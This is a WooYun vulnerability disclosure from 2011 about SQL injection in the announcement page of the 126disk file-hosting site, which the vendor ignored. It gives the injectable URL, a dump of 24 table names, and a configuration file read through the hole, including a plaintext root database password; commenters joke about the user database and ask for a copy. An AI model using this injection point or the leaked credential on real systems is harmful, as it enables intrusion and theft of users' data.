126网盘猪肉

漏洞概要

缺陷编号:WooYun-2011-02979

漏洞标题:126网盘猪肉

相关厂商:网易

漏洞作者:我了个去

提交时间:2011-10-11 23:00

公开时间:2011-10-16 23:00

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

Tags标签:

漏洞详情

披露状态:

2011-10-11: 细节已通知厂商并且等待厂商处理中
2011-10-11: 厂商已查看当前漏洞内容,细节仅向厂商公开
2011-10-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

公告处的一个猪肉,大家都懂得

详细说明:

http://www.126disk.com/gonggao.php?id=4root权限,400disk库也可查看,也可以load file读任意文件,比如数据库配置文件http://www.126disk.com/gonggao.php?id=-4 可以爆路径的 其实用google site 一下就可以发现很多warning ,不知有多少人在脱了吧?

漏洞证明:

inject:Database: 126disk[24 tables]+------------------+disk_admin || disk_adminlog || disk_adminmsg || disk_collection || disk_count || disk_file || disk_gonggao || disk_guolv || disk_haoyou || disk_integral || disk_integrallog || disk_jubao || disk_link || disk_links || disk_message || disk_mulu || disk_search || disk_server || disk_tag || disk_type || disk_user || disk_userlog || disk_visitors || disk_zhuanji |+------------------+400disk跟126disk库结构基本一样吧,貌似就用户数量不一样load file: class.php$mysql_host = "localhost";$mysql_user = "root";// 连接数据库用户名$mysql_pass = "mysql.123!@#~";// 连接数据库密码$mysql_data = "126disk";// 数据库的名字$mysql_charset = "gbk";

修复方案:

你懂的

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-10-16 23:00

厂商回复:

漏洞Rank:15WooYun评价)

最新状态:

暂无

评价

  1. 2010-01-01 00:00 Bloodwolf 白帽子 | Rank:43 漏洞数:6)

    一共5W多裤头,不见得多少。

  2. 2010-01-01 00:00 null 白帽子 | Rank:15 漏洞数:2)

    来晚了。。楼上求库!@@@ 好人一生平安。。